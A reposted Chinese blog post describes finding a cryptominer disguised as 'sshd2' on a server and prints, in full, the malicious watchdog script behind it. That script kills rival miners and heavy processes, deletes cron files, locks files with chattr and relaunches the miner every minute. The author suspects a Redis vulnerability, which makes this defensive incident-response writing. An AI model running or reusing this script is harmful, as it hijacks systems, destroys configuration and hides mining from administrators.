博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
一个挖矿脚本
阅读量:4612 次
发布时间:2019-06-09

本文共 2740 字,大约阅读时间需要 9 分钟。

遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高

仔细查看就知道和sshd是两个完全不同的进程,取名sshd2应该只是为了迷惑用户

ps -ef查看到父进程是一个/tmp/javax/config.sh, 这个文件在当前系统已经删除了,所以只能按照pid号通过lsof -p PID查看打开的文件句柄

在/proc/PID/fd里面顺利找到执行脚本

#!/bin/shexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinwhile [ 1 ]do    p=$(ps auxf|grep -v grep|grep sshd2|wc -l)    if [ ${p} -eq 0 ];    then        ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9    fi    chattr -i /var/spool/cron/root    chattr -i /var/spool/cron/crontabs/root    chattr -i /usr/local/bin/dns    pkill 6Tx3Wq    rm -f /tmp/6Tx3Wq    killall -9 38c985b26d38da0cbcc9f8ae3527e8e3b    killall -9 /tmp/.sysinfo/*    rm -f /tmp/.sysinfo/*    chattr +i /tmp/.sysinfo    rm -f /var/spool/cron/root    rm -f /var/spool/cron/backup.db    rm -f /var/spool/cron/dump.rdb    rm -f /var/spool/cron/jw    rm -f /var/spool/cron/uo    rm -f /var/spool/cron/vf    rm -f /tmp/root    rm -f /tmp/backup.db    rm -f /tmp/dump.rdb    rm -f /tmp/root    rm -f /var/spool/cron/crontabs/root    rm -f /var/spool/cron/crontabs/dump.rdb    killall -9 kworkerds    chattr -i /etc/cron.d/root    chattr -i /etc/cron.d/apache    chattr -i /etc/cron.d/0hourly    rm -f /etc/cron.d/root    rm -f /etc/cron.d/apache    rm -f /etc/cron.d/0hourly    rm -f /tmp/kworkerds    rm -f /var/tmp/kworkerds    rm -f /etc/cron.hourly/oanacroner    rm -f /etc/cron.hourly/oanacrona    rm -f /etc/cron.daily/oanacroner    rm -f /etc/cron.daily/oanacrona    rm -f /etc/cron.monthly/oanacroner    rm -f /usr/local/bin/dns    pkill .systemcero    pkill vTtHH    pkill -f /tmp/just4root    pkill -f /tmp/just4copy    pkill -f /tmp/dc_name    pkill x7    pkill cloudupdate    pkill diskmanagerd    pkill curl    pkill jspserv    pkill init    pkill sysupdate    pkill sysguard    pkill networkservice    pkill watchbog    rm -f /usr/share/watchbog/watchbog    rm -f /bin/httpsntp    rm -f /bin/ftpsntp    rm -f /tmp/.systemcero    rm -f /tmp/vTtHH    rm -f /usr/bin/.systemcero    rm -f /usr/bin/cloudupdate    rm -f /usr/bin/diskmanagerd    rm -f /lib/libterminfo.so    rm -f /tmp/config.json    rm -f /var/tmp/jspserv    rm -f /etc/update.sh    chattr -i /etc/sysupdate    rm -f /etc/sysupdate    rm -f /etc/config.json    echo >/tmp/6Tx3Wq    echo >/tmp/vTtHH    chattr +i /tmp/6Tx3Wq    chattr +i /tmp/vTtHH    p=$(ps auxf|grep sshd2|awk '{if($3>=70.0) print $2}')    name=""$p    if [ -z "$name" ]    then        ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9        nohup /tmp/javax/sshd2 &>>/dev/null &      else         :    fi    sleep 60 done

从脚本的删除动作来看,可能是通过redis的漏洞进来的,脚本似乎还想努力不让监控发现

修复方案

时间短,修复不是我来操作的。初步并没有发现隐藏的激活方式,所以按照上面脚本的内容反向处理一下应该就可以了,注意防范redis的漏洞。

转载于:https://www.cnblogs.com/mikeguan/p/11314005.html

你可能感兴趣的文章
Java高级特性 第5节 序列化和、反射机制
查看>>
每天敲一点code
查看>>
jquery
查看>>
IntelliJ IDEA 中文乱码问题解决办法
查看>>
【文文殿下】网络流24题计划
查看>>
Coursera台大机器学习课程笔记6 -- The VC Dimension
查看>>
Ubuntu 16 04 安装KVM
查看>>
【openlayers】CSS3样式的Popups
查看>>
常用表单及控件测试用例检查点总结
查看>>
UVA5874 Social Holidaying 二分匹配
查看>>
网络流24题 餐巾计划(费用流)
查看>>
Codeforces Round #478 (Div. 2) D Ghosts 会超时的判断两个之间关系,可以用map
查看>>
Redis之Hash
查看>>
mysql 相關
查看>>
支持新版chrome,用webstorm编译形成css和sourcemap,调试sass和less源文件
查看>>
Climbing Stairs
查看>>
用来武装Firebug的十四款Firefox插件
查看>>
几种常用排序算法代码实现和基本优化(持续更新ing..)
查看>>
css样式之超出隐藏
查看>>
python-scrapy框架
查看>>